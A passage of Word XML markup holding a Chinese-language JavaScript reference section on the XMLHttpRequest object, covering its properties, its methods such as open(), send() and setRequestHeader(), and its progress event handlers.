      </w:pPr>
      <w:r>
        <w:t>readonly string statusText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性使用名字而不是数字来指定请求的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>状态码。就是说，当状态为</w:t>
      </w:r>
      <w:r>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:t>时它将是</w:t>
      </w:r>
      <w:r>
        <w:t>"OK"</w:t>
      </w:r>
      <w:r>
        <w:t>，状态是</w:t>
      </w:r>
      <w:r>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:t>时它将是</w:t>
      </w:r>
      <w:r>
        <w:t>"Not Found"</w:t>
      </w:r>
      <w:r>
        <w:t>。如果服务器还没有设置状态码，这个属性将为空字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long timeout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定一个超时时间，单位为毫秒。如果</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求花费的时间超过这个时间，它将中止，同时触发一个超时事件。只能在调用</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>之后以及调用</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>之前设置这个属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly XMLHttpRequestUpload upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代一个</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequestUpload</w:t>
      </w:r>
      <w:r>
        <w:t>对象，该对象定义一系列用于监视</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求主体上传进度的事件处理程序注册属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean withCredentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定授权凭证是否应该包含在</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>请求中，以及</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>响应中的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>头信息是否应该处理。默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void abort()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将当前</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象重置为</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的状态，同时取消所有推迟的网络活动。例如，如果一个请求占用太长的时间，但对应的响应已经不再需要了，就可以调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string getAllResponseHeaders()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法返回服务器发送的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应头信息（过滤掉</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>头信息），如果头信息还没接收到则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。所有的头信息以一个单独的字符串的形式返回，每行一个头信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string getResponseHeader(string header)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回指定名字的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应</w:t>
      </w:r>
      <w:r>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:t>，如果该响应头还没有接收到或者在或响应中不存在指定</w:t>
      </w:r>
      <w:r>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:t>则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>相关的头信息已过滤，不可通过这个方法查询。如果响应包含多个这个指定名字的头，则返回的字符串将包含所有这些头的值，多个值之</w:t>
      </w:r>
      <w:r>
        <w:t>间使用一个逗号和一个空格连接与分隔。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>void open(string method,string url,[boolean async,string user,string pass])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法重置当前</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象，并保存这些参数，用于后面的</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:t>为用于请求的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>方法。已可靠实现的值包括</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>HEAD</w:t>
      </w:r>
      <w:r>
        <w:t>。有些浏览器可能也实现了</w:t>
      </w:r>
      <w:r>
        <w:t>CONNECT</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>PUT</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>TRACE</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>TRACK</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>为正在请求的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。相对</w:t>
      </w:r>
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:t>RL</w:t>
      </w:r>
      <w:r>
        <w:t>将按常规方法根据包含当前脚本的文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>解析。同源安全策略（参见</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）要求这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>与包含发起当前请求的脚本的文档拥有同样的主机和端口。</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>允许向支持</w:t>
      </w:r>
      <w:r>
        <w:t>CORS</w:t>
      </w:r>
      <w:r>
        <w:t>的服务器发起跨域请求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>参数并且值为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则请求将为同步方式，</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将阻塞页面，直到响应完成。除非是在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>中使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>，否则不推荐使用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可选的</w:t>
      </w:r>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>pass</w:t>
      </w:r>
      <w:r>
        <w:t>参数指定用于</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求的用户名和密码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">void overrideMimeType(string </w:t>
      </w:r>
      <w:r>
        <w:t>mime)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法指明使用指定的</w:t>
      </w:r>
      <w:r>
        <w:t>mime</w:t>
      </w:r>
      <w:r>
        <w:t>类型（如果包含的话，还有字符集）而不是使用响应的头信息中的</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t>来解析服务器的响应。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void send(any body)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法发出一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求。如果之前没有调用过</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>，或更一般一些，如果</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>不是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>将抛出一个异常。否则，它将发起一个包含以下内容的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>之前调用</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>时设置的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>方法、</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>以及授权凭证（如果有的话）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>之前调用</w:t>
      </w:r>
      <w:r>
        <w:t>setRequestHeader()</w:t>
      </w:r>
      <w:r>
        <w:t>定义的请求头信息</w:t>
      </w:r>
      <w:r>
        <w:t>，如果有的话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>传入到这个方法的</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>参数。</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>可以是一个指定请求主体的字符串或一个</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象，如果请求没有主体（例如</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求就不会有主体）也可以省略或为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>中，主体也可以是一个</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>、一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>或一个</w:t>
      </w:r>
      <w:r>
        <w:t>FormData</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果之前调用</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>时的</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>参数为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则这个方法将阻塞进程，直到</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>并且服务器的响应已经完全接收时才</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>会返回。否则，</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>将立即返回，同时服务器的响应将通过事件处理程序提供的通知异步地处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void setRequestHeader(string name,string value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>setRequestHeader()</w:t>
      </w:r>
      <w:r>
        <w:t>指定一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求头信息的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>，二者将包含在之后调用</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>时发起的请求中。这个方法只能在</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>时调用，即在调用</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>之后，但在调用</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>之前。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>的头信息已经定义了，则这个头信息的新值将是它之前的值加一个逗号、一个空格之后再加上在这次调用中指定的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果对</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>的调用指定了授权凭证，则</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>将自动发送一个适当的</w:t>
      </w:r>
      <w:r>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r>
        <w:t>请求头信息。不过，也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>setRequestHeader()</w:t>
      </w:r>
      <w:r>
        <w:t>方法手动追加头信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>自动设置</w:t>
      </w:r>
      <w:r>
        <w:t>"Content-Length"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Date"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Referer"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"User-Agent"</w:t>
      </w:r>
      <w:r>
        <w:t>，不允许谎报它们。还有一些其他头信息，包括与</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>相关的信息，无法使用这个方法来设置。完整列表见</w:t>
      </w:r>
      <w:r>
        <w:t>18.1</w:t>
      </w:r>
      <w:r>
        <w:t>节。</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lastRenderedPageBreak/>
        <w:t>最初的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象只定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序属性：</w:t>
      </w:r>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>XHR 2</w:t>
      </w:r>
      <w:r>
        <w:t>用一系列更容易使用的进度事件处理程序扩展这个列表。可通过设置这些属性或使用</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>的方法来注册事件处理程序。</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>事件总是分发到</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象本身，它们不会冒泡，也没有可供取消的默认操作。</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件有一个关联的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象，所有其他事件类型有一个关联的</w:t>
      </w:r>
      <w:r>
        <w:t>ProgressEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于可用于监视</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>上传进度的事件列表可参见</w:t>
      </w:r>
      <w:r>
        <w:t>upload</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>XMLRequ</w:t>
      </w:r>
      <w:r>
        <w:t>estUpload</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onabort</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当一个请求中止时触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当请求因错误失败时触发。注意，如</w:t>
      </w:r>
      <w:r>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>状态码不会造成错误，因为响应仍然成功地完成了。不过，解析</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>时发生</w:t>
      </w:r>
      <w:r>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:t>错误或一个无限循环的重定向都将引发这个事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当请求成功完成时触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>onloadend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
